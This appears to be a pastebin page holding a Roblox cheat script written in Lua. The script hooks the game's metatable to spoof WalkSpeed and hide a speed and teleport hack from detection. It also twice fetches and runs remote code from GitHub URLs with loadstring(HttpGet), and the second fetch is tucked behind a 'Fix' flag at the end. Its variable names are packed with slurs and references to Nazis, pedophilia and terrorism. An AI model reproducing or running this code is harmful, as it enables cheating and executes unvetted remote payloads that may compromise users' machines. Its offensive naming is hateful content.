Facebook
From van, 1 Year ago, written in AppleScript.
This paste is a reply to Roblox hack from Krovey - view diff
Embed
Download Paste or View Raw
Hits: 274
  1. -- +++++++++++++++++++++++++++++++++++++++
  2. -- + Haze Infinity Loader by Krovey+
  3. -- + Scripts Not Coded by Me             +
  4. -- +++++++++++++++++++++++++++++++++++++++
  5. loadstring(game:HttpGet("https://raw.githubusercontent.com/yuhsecurity/hazeinfinity/main/loader.lua"))()
  6. -- Thanks for using my screpeat wait() until game:IsLoaded()
  7.  
  8. getgenv().Fix = true
  9.  
  10. getgenv().TeclasWS = {
  11.     ["tecla1"] = "M", -- speed +5
  12.     ["tecla2"] = "N", -- speed -5
  13.     ["tecla3"] = "P" -- toggle  
  14. }
  15.  
  16.  
  17.  
  18. -- // servicios
  19. local MININOS_DOXXEADOS = game:GetService("Players")
  20. local AUDIOS_LOUD_DE_TRAP = game:GetService("StarterGui") or "son una mierda"
  21.  
  22. -- // objetos
  23. local neonazi = MININOS_DOXXEADOS.LocalPlayer
  24. local esvastica = neonazi:GetMouse()
  25.  
  26. -- // variables
  27. local lista_de_victimas_de_drizzy = getrenv()._G
  28. local da_hood_rblxm_REAL = getrawmetatable(game)
  29. local CP = da_hood_rblxm_REAL.__newindex
  30. local CP_DE_DRIZZY = da_hood_rblxm_REAL.__index
  31. local velocidad_de_cum = 200
  32. local es_pedofilo = true
  33.  
  34. -- // funciones para acortar codigo :]
  35. function anunciar_atentado_terrorista(fecha_del_atentado)
  36.     AUDIOS_LOUD_DE_TRAP:SetCore("SendNotification",{
  37.         Title="TechWare",
  38.         Text=fecha_del_atentado,
  39.         Icon="rbxthumb://type=Asset&id=1332213374&w=150&h=150"
  40.        })
  41. end
  42.  
  43.  
  44. getgenv().TECHWAREWALKSPEED_LOADED = true
  45.  
  46.  
  47. wait(1.5)
  48.  
  49.  
  50. anunciar_atentado_terrorista("Welcome"..TeclasWS.tecla3.."")
  51.  
  52. -- // conexión
  53. esvastica.KeyDown:Connect(function(el_impostor)
  54.     if el_impostor:lower() == TeclasWS.tecla1:lower() then
  55.         velocidad_de_cum = velocidad_de_cum + 1
  56.         anunciar_atentado_terrorista(" (speed =   "..tostring(velocidad_de_cum)..")")
  57.     elseif el_impostor:lower() == TeclasWS.tecla2:lower() then
  58.         velocidad_de_cum = velocidad_de_cum - 1
  59.         anunciar_atentado_terrorista(" (speed =  "..tostring(velocidad_de_cum)..")")
  60.     elseif el_impostor:lower() == TeclasWS.tecla3:lower() then
  61.         if es_pedofilo then
  62.             es_pedofilo = false
  63.             anunciar_atentado_terrorista("speed off")
  64.         else
  65.             es_pedofilo = true
  66.             anunciar_atentado_terrorista("speed on")
  67.         end
  68.     end
  69. end)
  70.  
  71. -- // mi parte favorita: metametodos
  72. setreadonly(da_hood_rblxm_REAL,false)
  73. da_hood_rblxm_REAL.__index = newcclosure(function(BEST_ON_TOP,IS_GARBAGE)
  74.     local esPedofilo = checkcaller()
  75.     if IS_GARBAGE == "WalkSpeed" and not esPedofilo then
  76.         return lista_de_victimas_de_drizzy.CurrentWS
  77.     end
  78.     return CP_DE_DRIZZY(BEST_ON_TOP,IS_GARBAGE)
  79. end)
  80. da_hood_rblxm_REAL.__newindex = newcclosure(function(kaias,ip,logger)
  81.     local unNeonazi = checkcaller()
  82.     if es_pedofilo then
  83.         if ip == "WalkSpeed" and logger ~= 0 and not unNeonazi then
  84.             return CP(kaias,ip,velocidad_de_cum)
  85.         end
  86.     end
  87.     return CP(kaias,ip,logger)
  88. end)
  89. setreadonly(da_hood_rblxm_REAL,true)
  90.  
  91. repeat wait() until game:IsLoaded()
  92. local Players = game:service('Players')
  93. local Player = Players.LocalPlayer
  94.  
  95. repeat wait() until Player.Character
  96.  
  97. local userInput = game:service('UserInputService')
  98. local runService = game:service('RunService')
  99.  
  100. local Multiplier = -0.22
  101. local Enabled = false
  102. local whentheflashnoiq
  103.  
  104. userInput.InputBegan:connect(function(Key)
  105.     if Key.KeyCode == Enum.KeyCode.LeftBracket then
  106.         Multiplier = Multiplier + 0.01
  107.         print(Multiplier)
  108.         wait(0.2)
  109.         while userInput:IsKeyDown(Enum.KeyCode.LeftBracket) do
  110.             wait()
  111.             Multiplier = Multiplier + 0.01
  112.             print(Multiplier)
  113.         end
  114.     end
  115.  
  116.     if Key.KeyCode == Enum.KeyCode.RightBracket then
  117.         Multiplier = Multiplier - 0.01
  118.         print(Multiplier)
  119.         wait(0.2)
  120.         while userInput:IsKeyDown(Enum.KeyCode.RightBracket) do
  121.             wait()
  122.             Multiplier = Multiplier - 0.01
  123.             print(Multiplier)
  124.         end
  125.     end
  126.  
  127.     if Key.KeyCode == Enum.KeyCode.P then
  128.         Enabled = not Enabled
  129.         if Enabled == true then
  130.             repeat
  131.                 game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + game.Players.LocalPlayer.Character.Humanoid.MoveDirection * Multiplier
  132.                 game:GetService("RunService").Stepped:waitn()
  133.             until Enabled == true
  134.         end
  135.     end
  136. end)
  137.  
  138. if Fix == true then
  139.     loadstring(game:HttpGet("https://raw.githubusercontent.com/youtubetutorials123/helo/main/123"))()
  140. end

Replies to Re: Roblox hack rss

Title Name Language When
Re: Re: Roblox hack local games = { [{606849621} applescript 10 Months ago.
Re: Re: Roblox hack big games applescript 1 Year ago.
captcha